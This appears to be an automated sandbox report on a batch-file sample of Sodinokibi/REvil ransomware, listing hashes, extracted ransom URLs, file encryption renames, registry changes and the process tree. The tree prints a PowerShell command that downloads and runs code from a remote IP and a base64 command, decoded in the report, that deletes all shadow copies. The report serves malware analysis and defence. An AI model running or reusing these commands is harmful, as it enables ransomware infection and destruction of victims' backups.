Analysis
- max time kernel: 132s
- max time network: 143s
- platform: windows10_x64
- resource: win10v200722
- submitted: 29-08-2020 18:10
Static task: static1
Behavioral task: behavioral1
  Sample: 703f05dca6cfaba3626152c6d4d1fcd6.bat
  Resource: win7
Behavioral task: behavioral2
  Sample: 703f05dca6cfaba3626152c6d4d1fcd6.bat
  Resource: win10v200722
General
- Target: 703f05dca6cfaba3626152c6d4d1fcd6.bat
- Size: 220B
- MD5: 0a6ac1495b26f97102dc547e02722707
- SHA1: a15c39e75f663c0e0ee152ac9c09541ffd6d1221
- SHA256: 25ef88f973e50b6cd72f2dd572618de7302e12a2925429568598205dc85a9585
- SHA512: 04b8fffa2dc6bb4b867392c307ae9472849b6872b8fca42568fec4ee07e76d09f41ff16007725b36a86ce3f45fabd6c5f86ac2ff26c71805cd11213bff539c2a
Malware Config
- Extracted: http://185.103.242.78/pastes/703f05dca6cfaba3626152c6d4d1fcd6
- Extracted: C:\5i0ubx-readme.txt (sodinokibi)
  http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/2122EC22BD4D0BB7
  http://decryptor.cc/2122EC22BD4D0BB7
Signatures
- Sodin, Sodinokibi, REvil
  Ransomware with advanced anti-analysis and privilege escalation functionality.
- Blacklisted process makes network request (119 IoCs)
  Processes: powershell.exe
- Modifies extensions of user files (9 IoCs)
  Ransomware generally changes the extension on encrypted files.
  Processes: powershell.exe
  description ioc process
  File renamed C:\Users\Admin\Pictures\EnableSelect.tif => \??\c:\users\admin\pictures\EnableSelect.tif.5i0ubx powershell.exe
  File renamed C:\Users\Admin\Pictures\MeasureInitialize.png => \??\c:\users\admin\pictures\MeasureInitialize.png.5i0ubx powershell.exe
  File opened for modification \??\c:\users\admin\pictures\MountEdit.tiff powershell.exe
  File renamed C:\Users\Admin\Pictures\DebugPublish.tif => \??\c:\users\admin\pictures\DebugPublish.tif.5i0ubx powershell.exe
  File renamed C:\Users\Admin\Pictures\OutWrite.png => \??\c:\users\admin\pictures\OutWrite.png.5i0ubx powershell.exe
  File renamed C:\Users\Admin\Pictures\ReadSkip.tif => \??\c:\users\admin\pictures\ReadSkip.tif.5i0ubx powershell.exe
  File renamed C:\Users\Admin\Pictures\SuspendPop.raw => \??\c:\users\admin\pictures\SuspendPop.raw.5i0ubx powershell.exe
  File renamed C:\Users\Admin\Pictures\ApproveGet.crw => \??\c:\users\admin\pictures\ApproveGet.crw.5i0ubx powershell.exe
  File renamed C:\Users\Admin\Pictures\MountEdit.tiff => \??\c:\users\admin\pictures\MountEdit.tiff.5i0ubx powershell.exe
- Enumerates connected drives (3 TTPs)
- Drops file in System32 directory (1 IoCs)
  Processes: powershell.exe
  description ioc process
  File opened for modification C:\Windows\System32\CatRoot2\dberr.txt powershell.exe
- Modifies service (2 TTPs, 4 IoCs)
  Processes: vssvc.exe
  description ioc process
  Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe
  Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe
  Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe
  Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe
- Sets desktop wallpaper using registry (2 TTPs, 1 IoCs)
  Processes: powershell.exe
  description ioc process
  Set value (str) \REGISTRY\USER\S-1-5-21-1400429095-533421673-2598934218-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\460.bmp" powershell.exe
- Drops file in Program Files directory (13 IoCs)
  Processes: powershell.exe
  description ioc process
  File created \??\c:\program files\5i0ubx-readme.txt powershell.exe
  File opened for modification \??\c:\program files\CompressMeasure.dot powershell.exe
  File opened for modification \??\c:\program files\ConvertToAssert.ini powershell.exe
  File opened for modification \??\c:\program files\ReadUnregister.avi powershell.exe
  File opened for modification \??\c:\program files\ReceiveSuspend.i64 powershell.exe
  File opened for modification \??\c:\program files\RenameUninstall.au powershell.exe
  File opened for modification \??\c:\program files\RestartExit.vstm powershell.exe
  File opened for modification \??\c:\program files\SwitchProtect.mp3 powershell.exe
  File opened for modification \??\c:\program files\UninstallRepair.3gp powershell.exe
  File opened for modification \??\c:\program files\UpdatePop.dwg powershell.exe
  File opened for modification \??\c:\program files\WatchWait.css powershell.exe
  File created \??\c:\program files (x86)\5i0ubx-readme.txt powershell.exe
  File opened for modification \??\c:\program files\ReadJoin.bat powershell.exe
- Drops file in Windows directory (1 IoCs)
  Processes: svchost.exe
  description ioc process
  File opened for modification C:\Windows\ServiceProfiles\LocalService\winhttp\cachev3.dat svchost.exe
- Modifies data under HKEY_USERS (6 IoCs)
  Processes: svchost.exe
  description ioc process
  Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad svchost.exe
  Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0e-3e-6f-2c-c8-c7 svchost.exe
  Set value (int) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0e-3e-6f-2c-c8-c7\WpadDecisionReason = "1" svchost.exe
  Set value (data) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0e-3e-6f-2c-c8-c7\WpadDecisionTime = d0062de1407ed601 svchost.exe
  Set value (int) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0e-3e-6f-2c-c8-c7\WpadDecision = "0" svchost.exe
  Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections svchost.exe
- Suspicious behavior: EnumeratesProcesses (8 IoCs)
  Processes: powershell.exe
  pid process
  1440 powershell.exe
  1440 powershell.exe
  1440 powershell.exe
  1440 powershell.exe
  1440 powershell.exe
  2052 powershell.exe
  2052 powershell.exe
  2052 powershell.exe
- Suspicious use of AdjustPrivilegeToken (9 IoCs)
  Processes: svchost.exe, powershell.exe, vssvc.exe
  description pid process
  Token: SeShutdownPrivilege 3584 svchost.exe
  Token: SeCreatePagefilePrivilege 3584 svchost.exe
  Token: SeDebugPrivilege 1440 powershell.exe
  Token: SeDebugPrivilege 1440 powershell.exe
  Token: SeDebugPrivilege 2052 powershell.exe
  Token: SeBackupPrivilege 2208 vssvc.exe
  Token: SeRestorePrivilege 2208 vssvc.exe
  Token: SeAuditPrivilege 2208 vssvc.exe
  Token: SeTakeOwnershipPrivilege 1440 powershell.exe
- Suspicious use of WriteProcessMemory (6 IoCs)
  Processes: cmd.exe, powershell.exe
  description pid process target process
  PID 408 wrote to memory of 1440 408 cmd.exe powershell.exe
  PID 408 wrote to memory of 1440 408 cmd.exe powershell.exe
  PID 408 wrote to memory of 1440 408 cmd.exe powershell.exe
  PID 1440 wrote to memory of 2052 1440 powershell.exe powershell.exe
  PID 1440 wrote to memory of 2052 1440 powershell.exe powershell.exe
  PID 1440 wrote to memory of 2052 1440 powershell.exe powershell.exe
Processes
- C:\Windows\system32\cmd.exe (PID 408)
  Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\703f05dca6cfaba3626152c6d4d1fcd6.bat"
  Signatures:
  - Suspicious use of WriteProcessMemory
  Child process:
  - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 1440)
    Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/703f05dca6cfaba3626152c6d4d1fcd6');Invoke-EQAQDZNHEGRIN;Start-Sleep -s 10000"
    Signatures:
    - Blacklisted process makes network request
    - Modifies extensions of user files
    - Sets desktop wallpaper using registry
    - Drops file in Program Files directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    Child process:
    - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 2052)
      Command line: powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      Note: the -e argument is base64-encoded UTF-16LE and decodes to: Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}
      This shadow-copy deletion is what starts vssvc.exe (PID 2208) and produces the VSS Diag registry writes listed under "Modifies service".
      Signatures:
      - Drops file in System32 directory
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
- C:\Windows\system32\svchost.exe (PID 3584)
  Command line: C:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc
  Signatures:
  - Drops file in Windows directory
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
- C:\Windows\system32\vssvc.exe (PID 2208)
  Command line: C:\Windows\system32\vssvc.exe
  Signatures:
  - Modifies service
  - Suspicious use of AdjustPrivilegeToken